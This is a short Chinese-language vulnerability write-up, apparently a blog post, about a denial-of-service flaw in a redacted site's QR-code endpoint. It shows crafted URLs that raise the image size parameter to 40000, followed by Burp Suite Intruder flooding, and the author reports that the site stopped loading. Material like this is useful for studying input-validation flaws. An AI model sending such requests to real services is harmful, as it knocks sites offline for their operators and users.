验证码大小可控可导致CUP爆满造成网站瘫痪

来看这个URL:

1
https://www.xxx.com/normal/download/qrcode?size=200&convert=https://www.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1

图片

注意这个参数:size=200,可以看到下面服务器访问速度是76ms,图片是948B说明很快,那么我们把200改成10000

构造URL:

1
https://www.xxx.com/normal/download/qrcode?size=10000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1

图片
改成10000的时候服务器响应速度是1.55s,图片字节是161KB了,那么我们继续改,改成38000

构造URL:

1
https://www.xxx.com/normal/download/qrcode?size=38000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1

图片

这时候响应速度是15.90s,图片字节变成了1.6MB!说明验证码大小可控!

接着打开BurpSuite抓包:访问40000

构造URL:

1
https://www.xxx.com/normal/download/qrcode?size=40000&convert=https://wx.xxx.com/download.html?app=gzim&from=singlemessage&isappinstalled=1

图片

接着吧数据包发送到Intruder:(爆破40000后四位的参数,让BurpSuite访问)

图片

图片

最后访问它的域名:

1
https://www.xxx.com/

图片

我这边网站一直在加载中!打不开!具体我没敢吧参数调大,怕吧网站整蹦了影响他们的业务….